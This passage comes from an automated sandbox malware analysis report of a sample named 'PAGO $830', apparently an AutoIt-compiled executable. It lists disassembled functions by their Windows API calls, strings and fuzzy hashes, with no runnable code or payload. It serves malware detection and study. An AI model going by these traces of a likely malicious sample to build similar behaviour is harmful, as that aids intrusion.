                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem
                                                          • String ID: 0
                                                          • API String ID: 135850232-4108050209
                                                          • Opcode ID: 6c32d778289fd119c9adca9b11543a7c0e702d6aca0ac3bb8d178a6f4b530712
                                                          • Instruction ID: 15d0ee2b320a1d63eefcaab9c12babe9e8d6b642a1773d3ef1ce43b4dd1297d9
                                                          • Opcode Fuzzy Hash: 6c32d778289fd119c9adca9b11543a7c0e702d6aca0ac3bb8d178a6f4b530712
                                                          • Instruction Fuzzy Hash: D9418E312153029FD720DF64C884B5ABBE8EF95324F14461EF8A697391E770A904CB7A
                                                          Function 00E0434B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0D0D0,00000000,?,?,?,?), ref: 00E043DF
                                                          • GetWindowLongW.USER32 ref: 00E043FC
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E0440C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: bafb627fcc38370fad787d6e0c9c817ad5248cd55a4dccf9279952b958bed186
                                                          • Instruction ID: 21ec71f3c4c24cae671aac03d353a45815720b97a0bf3ba1a3fb47da2f1101d3
                                                          • Opcode Fuzzy Hash: bafb627fcc38370fad787d6e0c9c817ad5248cd55a4dccf9279952b958bed186
                                                          • Instruction Fuzzy Hash: 2431A1B1100209AFDB209F78DC45BEA77A9EB04338F206725FA79A21E0D735AC948760
                                                          Function 00DF2F75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DF3282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DF2F9E,?,?), ref: 00DF329F
                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
                                                          • _wcslen.LIBCMT ref: 00DF2FC2
                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00DF302D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 946324512-2422070025
                                                          • Opcode ID: 87405266e99589e9a815af576f316cf0fbc15c78dbaca7ae0f29fdd4818add89
                                                          • Instruction ID: 30c352f6e85f7bf5d599d9ff9db8089cad9c21ffabbf1a043a3d08f4d22cd0d0
                                                          • Opcode Fuzzy Hash: 87405266e99589e9a815af576f316cf0fbc15c78dbaca7ae0f29fdd4818add89
                                                          • Instruction Fuzzy Hash: D931C4356002459FC720CF69C485E7A7BE0EF14318F6AC19AEA168B392DB72EE45C770
                                                          Function 00E04588 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E0463A
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E04648
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E0464F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: bca43be2c8a1587e97d5b68f3b04aeca9a1c1fd546731c49d1242614dd986e1c
                                                          • Instruction ID: 2fa61d031364577482a843acec39eb3e3a9f6c1ed1d517d45202039d6e2fe0a8
                                                          • Opcode Fuzzy Hash: bca43be2c8a1587e97d5b68f3b04aeca9a1c1fd546731c49d1242614dd986e1c
                                                          • Instruction Fuzzy Hash: 072192F5600208AFDB10DF14DC91DB737ACEB5A358B001449FB00A7291DB32EC85CA70
                                                          Function 00DD94CB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 176396367-2734436370
                                                          • Opcode ID: 710111b5762381239e1ef164e7cc04f0414c9721b4ecb315b9f6123f9296627c
                                                          • Instruction ID: fb2021c04f9b3885805662b1cba20060547acee780a212f58484ff1ace646ef1
                                                          • Opcode Fuzzy Hash: 710111b5762381239e1ef164e7cc04f0414c9721b4ecb315b9f6123f9296627c
                                                          • Instruction Fuzzy Hash: E221293224421166C732B624AC22FA7F3D8DF91310F588037F54696286EB66D95293B5
                                                          Function 00E036EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E03773
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E03783
                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E037A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: da4af02557f7326d1d7bb5ac94a9fcfed748fbf99b2559b4a5828431f0a15610
                                                          • Instruction ID: 61482b6bc7579720285d84dfc513dd3ca64ca6063295e27572bc12bd0468b226
                                                          • Opcode Fuzzy Hash: da4af02557f7326d1d7bb5ac94a9fcfed748fbf99b2559b4a5828431f0a15610
                                                          • Instruction Fuzzy Hash: E321D4B2600118BFEF218F65DC85EBB376EEF89754F149215F944AB1D0C671EC9187A0
                                                          Function 00DE4912 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE4926
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DE497A
                                                          • SetErrorMode.KERNEL32(00000000,?,?,00E0D0D0), ref: 00DE49EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume
                                                          • String ID: %lu
                                                          • API String ID: 2507767853-685833217
                                                          • Opcode ID: c2501abd05d4d277b06220c7108c148bb09a8c9019820d66428c8c242e01ca99
                                                          • Instruction ID: 12fa417cb1a30fa0122a97d4d3b971bc6b83ad742a86d2a625f3d54de7a7954e
                                                          • Opcode Fuzzy Hash: c2501abd05d4d277b06220c7108c148bb09a8c9019820d66428c8c242e01ca99
                                                          • Instruction Fuzzy Hash: 20314175A00209AFDB10DF55C885EAA7BF9EF04314F148099F909EB262DB71EE45CB71
                                                          Function 00E04120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E04184
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E04199
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E041A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 2163c6f268bda43418b0157b1000bef2bfe8610a9272376694904b68750dbb74
                                                          • Instruction ID: 94bccb1d9e56f7da1655a1c22b7aef401f4aef42d1581450f56b106ee163dc98
                                                          • Opcode Fuzzy Hash: 2163c6f268bda43418b0157b1000bef2bfe8610a9272376694904b68750dbb74
                                                          • Instruction Fuzzy Hash: 9A11E3B1240208BEEF205F25CC06FA73BE8EF95B28F111514FB55F20E0D671E8919B60
                                                          Function 00DD2E95 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                            • Part of subcall function 00DD2CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2D09
                                                            • Part of subcall function 00DD2CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2D1A
                                                            • Part of subcall function 00DD2CEB: GetCurrentThreadId.KERNEL32 ref: 00DD2D21
                                                            • Part of subcall function 00DD2CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2D28
                                                          • GetFocus.USER32 ref: 00DD2EBB
                                                            • Part of subcall function 00DD2D32: GetParent.USER32(00000000), ref: 00DD2D3D
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00DD2F06
                                                          • EnumChildWindows.USER32(?,00DD2F7E), ref: 00DD2F2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                          • String ID: %s%d
                                                          • API String ID: 1272988791-1110647743
                                                          • Opcode ID: 886a6f6c6dd7be0eafac1e836c68c2839bce0dcc12880f2daf1eb4dbf0c6b992
                                                          • Instruction ID: f4d15e6b95e57e6f83cc80b2fcdb58566fcda20c98677fff2de23d82a388f2aa
                                                          • Opcode Fuzzy Hash: 886a6f6c6dd7be0eafac1e836c68c2839bce0dcc12880f2daf1eb4dbf0c6b992
                                                          • Instruction Fuzzy Hash: 7111A2756002056BCF147FB58C89AFE376AEF94314F04406AF909AB292DE7199899B70
                                                          Function 00E057B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E057F6
                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E05823
                                                          • DrawMenuBar.USER32(?), ref: 00E05832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$InfoItem$Draw
                                                          • String ID: 0
                                                          • API String ID: 3227129158-4108050209
                                                          • Opcode ID: e8705d3e221627f2c0650c111778263be016fd5912cfe284ab4b4fab27f81fd1
                                                          • Instruction ID: 8dc4e13960b34d4504246a441a9a6b1160fa97294796b5a9bec004e623de2be7
                                                          • Opcode Fuzzy Hash: e8705d3e221627f2c0650c111778263be016fd5912cfe284ab4b4fab27f81fd1
                                                          • Instruction Fuzzy Hash: B6016932600218AFDB209F51DC48BAB7BB8FB45354F10C0A9ED49E6191DB748AC4EF31
                                                          Function 00DF3355 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInitInitializeUninitialize
                                                          • String ID:
                                                          • API String ID: 1998397398-0
                                                          • Opcode ID: b53f2438d7b363e32dc194b25e71ea11c62f3d0874494708e1cc014e49a37499
                                                          • Instruction ID: 761624ebc52d847cec69a1656fadab289b22d58ffbb19b8113571640fe767ff6
                                                          • Opcode Fuzzy Hash: b53f2438d7b363e32dc194b25e71ea11c62f3d0874494708e1cc014e49a37499
                                                          • Instruction Fuzzy Hash: 1AA138756042049FC700EF28C485A2AB7E5FF88714F0AC859FA899B362DB71ED45CB72
                                                          Function 00DD031F Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD04D9
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD04F1
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00E0D108,000000FF,?,00000000,00000800,00000000,?,00E0FC24,?), ref: 00DD0516
                                                          • _memcmp.LIBVCRUNTIME ref: 00DD0537
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: d41c1304252aabb6eaeab838f2e4d9d2c48d61c69fa2254cb2230f8976135d7c
                                                          • Instruction ID: 88e726ba1a6c2df93b96d8c1bdcdbf3376a3b6da26ffb0064890bc5ba13fe2b4
                                                          • Opcode Fuzzy Hash: d41c1304252aabb6eaeab838f2e4d9d2c48d61c69fa2254cb2230f8976135d7c
                                                          • Instruction Fuzzy Hash: AB810A71A00109EFCB04DF94C984EEEBBB9FF89315F244559E506AB250DB71AE46CF60
                                                          Function 00DB1331 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 565a6ebcb0366cb5355bffbfb2f81e675be661ad93b8aa0be4f8fde709537a95
                                                          • Instruction ID: ea0f040ea862d6d460ba434beff8093d859a14a0cece96fbe1f3184c38c3f0b2
                                                          • Opcode Fuzzy Hash: 565a6ebcb0366cb5355bffbfb2f81e675be661ad93b8aa0be4f8fde709537a95
                                                          • Instruction Fuzzy Hash: EE417D39A00600EBDF206BFD8C55BFE3AB4FF42730F684225F41AD2291EA7489458271
                                                          Function 00E06146 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(0139E8E8,?), ref: 00E061B0
                                                          • ScreenToClient.USER32(?,?), ref: 00E061E3
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E06250
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 8239c1982935c4071272a0dea204c243c67ae7865a50f22eb48e07a5e5b35a6d
                                                          • Instruction ID: 1a90699f456f489332109d122f4082c464195ed48ada235d2b68716545b8fa5a
                                                          • Opcode Fuzzy Hash: 8239c1982935c4071272a0dea204c243c67ae7865a50f22eb48e07a5e5b35a6d
                                                          • Instruction Fuzzy Hash: 8F516E74900209EFCF10DF68C880AAE7BB6FF95364F109159F955AB2A0D730AD91CB90
                                                          Function 00DF19FD Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00DF1A24
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1A32
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DF1AB1
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1ABB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$socket
                                                          • String ID:
                                                          • API String ID: 1881357543-0
                                                          • Opcode ID: 965559d78799aae621c2a6764ad11cce8e9626533c639aa4899dd28316e80919
                                                          • Instruction ID: 5edf3af9199ada8697e1060c7ba6dcdcfcd08e678d8052d47a978dcdf3676c63
                                                          • Opcode Fuzzy Hash: 965559d78799aae621c2a6764ad11cce8e9626533c639aa4899dd28316e80919
                                                          • Instruction Fuzzy Hash: 3C417039600200AFE720AF25C886F2677A5EF44714F58C458F6699F2D2D772ED428BB1
                                                          Function 00DAB3BF Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f122ffccaf7409e934f14669a76bc8f4fd06486360a9547e08729cd0bf66d63a
                                                          • Instruction ID: 6a8d4d33f06962b09eaab42898233bc3ccb34570e2cc80d6711995671f7a569f
                                                          • Opcode Fuzzy Hash: f122ffccaf7409e934f14669a76bc8f4fd06486360a9547e08729cd0bf66d63a
                                                          • Instruction Fuzzy Hash: E8410675A00314AFD7249F78C841BAABBE9EB89720F10452BF551DB282D7B5E94287B0
                                                          Function 00DE55F7 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DE56A1
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00DE56C7
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DE56EC
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DE5718
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
